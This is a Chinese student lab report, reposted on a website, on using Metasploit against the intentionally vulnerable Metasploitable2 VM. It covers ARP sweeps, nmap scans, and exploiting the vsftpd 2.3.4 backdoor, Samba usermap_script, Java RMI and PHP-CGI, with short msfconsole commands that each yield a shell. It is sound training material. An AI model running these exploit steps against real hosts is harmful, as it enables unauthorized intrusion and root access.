Metasploit攻击渗透实践

1.实验内容

下载官方靶机Metasploitable2,完成下面实验内容。
(1)前期渗透
(2)Vsftpd源码包后门漏洞(21端口)
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
(4)Java RMI SERVER命令执行漏洞(1099端口)
(5)PHP CGI参数执行注入漏洞(80端口)

2.实验目的

掌握metasploit的用法,了解各种漏洞。

3.实验环境

kali虚拟机以及Metasploitable2虚拟机配置

虚拟机配置截图1
虚拟机配置截图2

Metasploitable2虚拟机配置方法:
1、下载虚拟机文件https://www.rapid7.com/products/metasploit/metasploitable/
2、下载好后解压,在VM里打开

image

3、进入Metasploitable2虚拟机后根据提示输入用户名密码都为msfadmin。

参考:https://blog.csdn.net/m0_65992344/article/details/140619287

遇到的问题:
尝试kali ping一下但是不通,查找资料发现两个虚拟机的网络设置需要一样、比如都是桥接模式或仅主机模式、NAT模式,而我的电脑只有net可以。

24a07405e1aba8f7ba171c8f530079d0

4.实验过程与分析

4.1 前期渗透

4.1.1 主机发现

首先查看kali和靶机的ip

663d9cd70366aca058923ae6eb46f6e9

3db7eae3543c9b4ea63dc2fb449a8150

在kali虚拟机中打开msfconsole,执行ARP扫描,输入:
search arp_sweep //寻找匹配的ARP模块
use 0 //使用arp_sweep模块
set RHOSTS 192.168.3.0/24
然后run

459e00d0241f04b72298ad903cb03a61

发现目标主机在线,同时还有目标主机的一些识别信息

4.1.2 端口扫描

使用nmap进行端口扫描,输入nmap -sS -sV 192.168.186.132对目标主机进行SYN扫描并进行版本探测。

3f7d21da06c606f339f5ca6b5d2c3283

扫描出了开放的端口以及一些存在的漏洞

4.1.3 漏洞扫描

输入nmap -script=vuln 192.168.186.132对靶机进行漏洞扫描。

21端口

21端口的FTP服务存在vsFTPd 2.3.4版本后门漏洞(CVE-2011-2523)vsFTPd 2.3.4版本存在后门,于2011年7月3日披露,7月4日被报道。从检测结果中“Shell command: id”以及“Results: uid=0 (root) gid=0 (root)”可知,攻击者可利用该后门获取root权限。

9dba53e6a59cc266bdb5f4627d453943

25端口

25端口存在许多漏洞如:ssl-poodle漏洞:属于SSL协议信息泄露漏洞,CVE编号CVE-2014-3566,因SSL协议非确定性CBC填充,易被中间人通过填充预言机攻击获取明文;ssl-dh-params 漏洞:是匿名Diffie-Hellman密钥交换中间人漏洞,TLS服务用匿名DH交换仅防被动窃听,易遭主动中间人攻击;Logjam 漏洞(TLS DHE_EXPORT 密码套件降级中间人攻击):CVE编号CVE-2015-4000,TLS处理DHE_EXPORT密钥交换时存在缺陷,会被降级到512位弱加密;

2d888fb4fcf62769f3962d001ff956cd

80端口

80端口上有漏洞如:1.slowloris http-check(CVE-2007-6750):状态为LIKELY VULNERABLE,属于DoS攻击漏洞,通过保持大量半打开连接耗尽服务器资源;2.http-sql-injection:检测到多个URL存在SQL注入可能;

82af08da2f7c9a92c4d08cf57ef0a880

1099端口

1099端口上的漏洞为RMI注册表默认配置远程代码执行漏洞,RMI注册表默认配置允许从远程URL加载类,这会导致远程代码执行。

fb736dc0e2d59df06716a220f61e9835

5432端口

5432端口中存在漏洞:1.SSL/TLS中间人漏洞:ssl-ccs-injection(CVE-2014-0224),OpenSSL在处理ChangeCipherSpec消息时存在缺陷,允许中间人攻击者触发使用零长度主密钥,进而劫持会话或获取敏感信息;
2.SSL信息泄露漏洞:ssl-poodle(CVE-2014-3566),因SSL3.0协议的非确定性CBC填充,中间人可通过填充预言机攻击获取明文数据;3.Diffie-Hellman密钥交换漏洞:ssl-dh-params,因Diffie-Hellman组强度不足,TLS服务易受被动窃听攻击。

2e85819dc2ff4633a6f7cd06c30a2ec2

8180端口

多个/admin路径下的页面的JSESSIONID Cookie均未设置 “httponly” 标志。“httponly” 标志用于防止Cookie被客户端脚本访问,若未设置,攻击者可通过XSS攻击窃取用户的JSESSIONID,进而劫持会话。

cbdabefa323f13d40095e9d8af3e5278

d58abb033dfa73ddb090e5efaa42237d

4.2 Vsftpd源码包后门漏洞(21端口)

输入nmap -sV -p 21 192.168.186.132扫描靶机的21端口运行的是vsftpd 2.3.4

aa800cc3cbfb6c088e3f2107a764dc43

Metasploit构造利用vsftpd 2.3.4版本后门漏洞进行攻击
use exploit/unix/ftp/vsftpd_234_backdoor //利用vsftpd 2.3.4版本后门漏洞
set RHOSTS 192.168.186.132
run

e4ecdee853c8bc7541f58f9d08cb85bf

获取shell成功

4.3 SambaMS-RPC Shell命令注入漏洞(端口139)

输入nmap -p 139 192.168.186.132扫描靶机的139端口

d256de2833f9713537692293d92dce64

Metasploit构造利用Samba服务的usermap_script漏洞。
use exploit/multi/samba/usermap_script //Samba服务的usermap_script漏洞
set RHOST 192.168.186.132
run

37ffe0f9ce4ca6cfcbd542f57af66a6a

获取shell成功

4.4 Java RMI SERVER命令执行漏洞(1099端口)

输入nmap -p 1099 192.168.186.132扫描靶机的1099端口

4d49c91e1775aaa30bb9876a052a8ca9

Metasploit构造利用Java RMI服务的远程代码执行漏洞。
use exploit/multi/misc/java_rmi_server //Java RMI服务的远程代码执行漏洞
set RHOST 192.168.186.132
run

7216a3f01668118504960b06bc552ebd

输入shell建立shell进程

4.5 PHP CGI参数执行注入漏洞(80端口)

输入`nmap -p 80 192.168.186.132扫描靶机的80端口

d56245cff37aaff94238c13b7d589489

Metasploit构造利用PHP-CGI的参数注入漏洞。
use exploit/multi/http/php_cgi_arg_injection //PHP-CGI的参数注入漏洞
set RHOST 192.168.186.132
run

fec767a6b08c7a42859a08fb4278a38a

输入shell建立shell进程

5.问题及解决

在上文中有体现,基本上没什么问题,比较顺利。

6.心得体会

通过本次Metasploit攻击实践,我对网络攻击方面的知识更加深刻,通过Metasploit进行构造攻击已知漏洞非常快速有效、使得我们应该认识到对于安全的防范意识需要提升,如果不及时排除这些漏洞,哪怕是看似微小的疏忽都可能成为攻击者的突破口,给系统安全带来极大风险。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/964635.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!